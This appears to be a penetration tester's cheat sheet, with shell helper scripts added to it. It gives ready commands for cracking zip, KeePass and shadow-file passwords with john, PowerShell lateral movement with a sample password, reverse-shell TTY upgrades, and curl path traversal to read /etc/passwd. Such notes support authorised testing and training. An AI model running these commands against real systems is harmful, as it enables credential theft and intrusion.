M4RCG04M

UTILS

Unzip encrypted zips

zip2john <FILE>.zip > zip.hash
john --wordlist=<WORDLIST> zip.hash
john --show zip.hash

Create user list with names

username-anarchy --input-file names.txt --select-format first,flast,first.last,firstl > usernames.txt
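The same four formats the username-anarchy line above selects (first, flast, first.last, firstl), generated in plain shell, as an added example that is not part of the original notes or of username-anarchy itself. It reads "First Last" lines on stdin, lower-cases them, uses the first and last word (middle names are ignored), skips single-word lines and removes duplicates; the sample names are constructed.

```shell
#!/bin/sh
# Added example: generate username candidates from "First Last" names.
# Assumption: input is one person per line, words separated by whitespace.
gen_usernames() {
    tr '[:upper:]' '[:lower:]' | awk 'NF >= 2 {
        f = $1; l = $NF
        print f                          # first       -> john
        print substr(f, 1, 1) l          # flast       -> jsmith
        print f "." l                    # first.last  -> john.smith
        print f substr(l, 1, 1)          # firstl      -> johns
    }' | awk '!seen[$0]++'               # de-duplicate, keeping first occurrence
}

# Constructed sample input (a middle name and a single-word line included)
SAMPLE_NAMES='John Smith
Jane Marie Doe
madonna'

printf '%s\n' "$SAMPLE_NAMES" | gen_usernames
```

Pipe the result into the same place the username-anarchy output goes (`... | gen_usernames > usernames.txt`); single-word entries are dropped on purpose because none of the four formats is defined for them.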

KeePass Master Password cracking

keepass2john data.kdbx > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

DECODE BASE64

echo -n "<BASE64_STRING>" | base64 -d; echo

CRACK SHADOW TXT

Both /etc/passwd and /etc/shadow are needed. /etc/shadow is readable only by root, so this normally follows a privilege escalation or an arbitrary file read; unshadow merges the two so john sees user and hash on one line.

unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
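An added example, not part of the original notes, that triages the unshadowed file before it goes to john: locked or passwordless accounts are dropped and each remaining hash is mapped to the john --format it needs, so a file that mixes md5crypt and sha512crypt is cracked in the right passes. The sample lines and hashes are constructed; the format names assume John the Ripper jumbo, and yescrypt ($y$), which has no native john format, is mapped to --format=crypt (libc crypt(3)).

```shell
#!/bin/sh
# Added example: triage unshadow output before cracking.

# Map a crypt(3) hash prefix to a john --format name (jumbo names assumed).
john_format_for() {   # john_format_for HASH
    case "$1" in
        '$1$'*)                   echo md5crypt ;;
        '$2a$'*|'$2b$'*|'$2y$'*)  echo bcrypt ;;
        '$5$'*)                   echo sha256crypt ;;
        '$6$'*)                   echo sha512crypt ;;
        '$7$'*)                   echo scrypt ;;
        '$y$'*)                   echo crypt ;;      # yescrypt: no native format, use libc via --format=crypt
        *)                        echo unknown ;;
    esac
}

# Keep only lines whose password field is a real hash. Empty, "*" and "!..."
# are locked/passwordless; "x" means the passwd line never got its shadow
# entry merged (wrong shadow file), so it is skipped too.
crackable_lines() {
    awk -F: '$2 != "" && $2 != "x" && $2 != "*" && $2 !~ /^!/ { print }'
}

# Print USER<TAB>FORMAT for every crackable account read on stdin
triage() {
    crackable_lines | while IFS=: read -r user hash rest; do
        printf '%s\t%s\n' "$user" "$(john_format_for "$hash")"
    done
}

# Distinct formats present, one per line, one john run per format
formats_needed() { triage | cut -f2 | sort -u; }

# Constructed sample in unshadow output format (hashes are not real)
SAMPLE_UNSHADOWED='root:$6$saltsalt$constructedsha512hash:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:!:4:65534:sync:/bin:/bin/sync
alice:$1$saltsalt$constructedmd5hash:1000:1000:alice:/home/alice:/bin/bash
bob::1001:1001:bob:/home/bob:/bin/sh'

printf '%s\n' "$SAMPLE_UNSHADOWED" | triage
```

On a real file: `crackable_lines < unshadowed.txt > to_crack.txt`, then `for f in $(formats_needed < unshadowed.txt); do john --format="$f" --wordlist=/usr/share/wordlists/rockyou.txt to_crack.txt; done`. Running john once per format avoids it guessing a single format for the whole file and silently skipping the rest.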

PowerShell Lateral Movement (Invoke-Command)

# Build a credential object for the target account; <HOST> is the machine (or domain) the account belongs to
$user = "<HOST>\<user>"
$password = ConvertTo-SecureString "butterfly!#1" -AsPlainText -Force   # example password; Get-Credential avoids leaving it in the history
$cred = New-Object System.Management.Automation.PSCredential($user, $password)

# Runs over WinRM (TCP 5985/5986): the account must be a local admin or in Remote Management Users on SNIPER
Invoke-Command -Credential $cred -ComputerName SNIPER -ScriptBlock { whoami }

TTY Upgrade

To get a fully interactive terminal from a basic reverse shell, follow these steps:

  1. Once you have a shell on the target, spawn a pseudo-terminal (if script is missing, python3 -c 'import pty; pty.spawn("/bin/bash")' does the same):

script /dev/null -c bash

  2. Press CTRL + Z to background the shell.

  3. On your local terminal run:

stty raw -echo; fg

  4. Reset the terminal:

reset xterm

  5. Export the TERM and SHELL variables:

export TERM=xterm
export SHELL=/bin/bash

  6. Set the window size. Get the size of your local terminal with:

stty size

and then set the same rows and columns in the remote shell, otherwise editors and pagers wrap at the wrong width:

stty rows x columns y
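The last two steps, as an added helper that is not part of the original notes: it turns the local `stty size` output into the single line to paste into the remote shell after `stty raw -echo; fg`. When the local stdin is not a tty (`stty size` prints nothing) it falls back to 24x80 instead of emitting a broken `stty rows` command.

```shell
#!/bin/sh
# Added example: build the remote-side fix-up line from the local terminal size.
remote_tty_line() {   # remote_tty_line "ROWS COLS"
    set -- $1                           # word-split the "ROWS COLS" pair; empty input yields no words
    rows="${1:-24}"; cols="${2:-80}"    # assumed fallback when not running in a tty
    printf 'export TERM=xterm SHELL=/bin/bash; stty rows %s columns %s\n' "$rows" "$cols"
}

# Local side: print the line to paste into the remote shell
remote_tty_line "$(stty size 2>/dev/null)"
```

Run it locally in the terminal that holds the reverse shell (not in the remote shell), then paste its output after foregrounding the shell with `fg`.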

CURL

Verbose output

curl -v http://<DOMAIN>

POST Method

curl -X POST http://<DOMAIN>

PUT Method

curl -X PUT http://<DOMAIN>

Use --path-as-is to send /../ or /./ segments literally. By default curl normalises dot segments out of the path before sending the request, so a traversal attempt never reaches the server without it.

curl --path-as-is http://<DOMAIN>/../../../../../../etc/passwd

File Upload (multipart form; the field name must match the form's input name, and ;type= after the file sets the part's Content-Type when the server filters on it)

curl -F myFile=@<FILE> http://<RHOST>
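An added example, not part of the original notes, that wraps the curl switches above into two helpers: a method probe that uses --write-out to capture the status code each HTTP method gets (a 2xx on PUT or DELETE is what you want to see before trying an upload), and a builder for the --path-as-is traversal URL with a chosen depth. The target URL is taken from a TARGET environment variable and is an assumption; nothing is requested unless it is set.

```shell
#!/bin/sh
# Added example: HTTP method probe and --path-as-is traversal URL builder.

# Status code for one method. -s -o /dev/null drops the body, --max-time bounds a
# hanging target; curl prints 000 when the connection itself fails.
http_status() {   # http_status METHOD URL
    curl -s -o /dev/null --max-time 5 -X "$1" -w '%{http_code}' "$2"
}

# Print METHOD<TAB>STATUS for each method (default list when none given)
probe_methods() {   # probe_methods URL [METHOD...]
    url="$1"; shift
    if [ $# -eq 0 ]; then set -- GET POST PUT DELETE OPTIONS; fi
    for m in "$@"; do
        printf '%s\t%s\n' "$m" "$(http_status "$m" "$url")"
    done
}

# Build BASE/../../<TARGET_PATH> with DEPTH "../" segments; send it with
# --path-as-is so curl does not collapse the dot segments client-side.
traversal_url() {   # traversal_url BASE_URL DEPTH TARGET_PATH (no leading slash)
    base="${1%/}"; depth="$2"; target="$3"; segs=""
    i=0
    while [ "$i" -lt "$depth" ]; do segs="${segs}../"; i=$((i + 1)); done
    printf '%s/%s%s\n' "$base" "$segs" "$target"
}

fetch_as_is() {   # fetch_as_is BASE_URL DEPTH TARGET_PATH
    curl -s --path-as-is "$(traversal_url "$@")"
}

# Only touches the network when TARGET is set, e.g. TARGET=http://<RHOST> sh probe.sh
if [ -n "${TARGET:-}" ]; then
    probe_methods "$TARGET"
    fetch_as_is "$TARGET" 6 etc/passwd
fi
```

A 405 or 501 on PUT means the method is refused at that path; a 2xx is worth following with `curl -X PUT --data-binary @<FILE> <URL>`. Compare the traversal fetch with and without --path-as-is in `-v` output to confirm the dot segments actually left the client.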


Last updated 4 months ago